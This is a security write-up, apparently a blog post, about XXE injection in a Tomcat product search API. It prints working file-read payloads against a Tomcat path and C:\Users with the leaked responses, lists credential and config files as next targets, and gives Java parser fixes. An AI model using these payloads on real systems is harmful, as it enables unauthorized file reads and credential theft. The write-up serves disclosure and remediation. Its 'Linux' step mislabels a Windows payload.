XXE Injection to Arbitrary File Read — From a Product Search API

Some vulnerabilities are hidden deep in complex authentication flows or chained across five different endpoints. And then there are the ones sitting right on the surface, waiting for someone to send the right input.

This was a product search API. It accepted XML. It trusted everything inside it.

The Target

During a web application assessment I came across a search functionality that submitted product queries to a backend API. Intercepting the request in Burp Suite revealed something immediately interesting — the request body was XML, not JSON.

<products>
    <product>
        <name>invisiblene</name>
        <code>619</code>
        <tags>entertainment</tags>
        <description>test</description>
    </product>
</products>

Any time I see an application parsing XML from user input, XXE goes straight to the top of my checklist.

What is XXE?

XML External Entity (XXE) injection is a vulnerability that exploits the way XML parsers handle external entity references.

XML has a feature called Document Type Definition (DTD) — a way to define the structure and entities of an XML document. An entity is essentially a variable. You can define one like this:

<!DOCTYPE root [
    <!ENTITY greeting "Hello World">
]>
<data>&greeting;</data>

When the parser processes &greeting;, it substitutes it with Hello World. Simple enough.

But XML also supports external entities — entities that load their value from an external source, including the local filesystem:

<!ENTITY xxe SYSTEM "file:///etc/passwd">

When the parser hits &xxe;, it opens /etc/passwd and substitutes the file contents inline. If the application then reflects that value back in the response — you have arbitrary file read.

The root cause is simple: the XML parser is processing external entities from user-supplied input with no restrictions.

Step 1 — Confirming XXE on Linux

I modified the XML body to inject a DTD with an external entity pointing at /etc/passwd — the classic proof-of-concept for XXE on Linux:

<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "file:///F:\[REDACTED]\Tomcat_9.0.102\webapps">
]>
<products>
    <product>
        <name>invisiblene</name>
        <code>619</code>
        <tags>entertainment</tags>
        <description>&xxe;</description>
    </product>
</products>

The entity &xxe; was placed inside the <description> field — a value that gets reflected back in the API response.

XXE payload injected via Burp Repeater — response reflects Tomcat webapps directory contents

The server responded with 200 OK and the <description> field in the response contained the directory listing of the Tomcat webapps folder:

<description>
    docs
    manager
    ROOT
</description>

The parser fetched the path, read its contents, and reflected them back without question. XXE confirmed.

Step 2 — Escalating on Windows

The server was running Apache Tomcat 9.0.102 on Windows. The path from the first response confirmed a Windows filesystem. I pivoted to target Windows-specific sensitive paths.

On Windows, a reliable target is C:\Users — it lists all user accounts on the machine:

<!DOCTYPE root [
    <!ENTITY haha SYSTEM "file:///C:\Users">
]>
<products>
    <product>
        <name>invisiblene</name>
        <code>619</code>
        <tags>entertainment</tags>
        <description>&haha;</description>
    </product>
</products>

$XXE payload targeting C:\Users on Windows — response lists all user accounts$

The response returned the full contents of C:\Users:

<description>
    All Users
    byeh
    Default
    Default User
    desktop.ini
    Public
</description>

Every user account on the machine — enumerated in one request. From here the natural next steps would be targeting user-specific directories for SSH keys, credentials files, application configs, or any sensitive data stored on disk.

Why This Happened — Root Cause

The vulnerability exists because the XML parser was configured with default settings. By default, most XML parsers — including Java’s built-in parsers used by Tomcat applications — enable external entity processing.

The developer never explicitly disabled it. There was no DTD validation, no entity allowlist, no input sanitization on the XML body.

The vulnerable parser configuration in Java typically looks like this under the hood:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// Missing: factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Missing: factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(inputStream); // parses attacker-controlled XML as-is

Two lines of configuration. That’s all it takes to prevent this entirely.

Impact

With arbitrary file read on a Windows server running Tomcat:

User enumeration — all accounts on the machine identified via C:\Users
Configuration files — Tomcat’s conf/tomcat-users.xml contains admin credentials in plaintext
Application secrets — database connection strings, API keys, hardcoded passwords in config files
Source code — web application source files readable from the webapps directory
Potential for SSRF — external entities can also point to internal network resources via http:// URIs, enabling server-side request forgery as a secondary attack

Remediation

Fix 1 — Disable DTD processing entirely (recommended):

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
DocumentBuilder builder = factory.newDocumentBuilder();

This completely blocks DOCTYPE declarations — the attacker can’t define any entities at all.

Fix 2 — Disable external entity and parameter entity processing:

factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

Fix 3 — Switch to a safer data format:

If the API doesn’t strictly require XML, switch to JSON. JSON has no concept of entities or DTDs — the entire attack surface disappears.

{
  "products": [{
    "name": "invisiblene",
    "code": "619",
    "tags": "entertainment",
    "description": "test"
  }]
}

Fix 4 — Use a security-focused XML parsing library:

Libraries like OWASP’s XML Security provide secure-by-default configurations that disable dangerous features out of the box.

Key Takeaways

Any application that parses XML from user input should be tested for XXE — it’s one of the first things to check
Default XML parser configurations are insecure — external entity processing is enabled unless explicitly disabled
XXE is not just /etc/passwd — on Windows targets, pivot to Tomcat configs, user directories, and application secrets
The fix is two lines of Java — there is no excuse for this being in production
If you see XML in a request body, send a DTD — the response will tell you everything

Found this useful? More writeups coming. Hit me up on X if you want to discuss.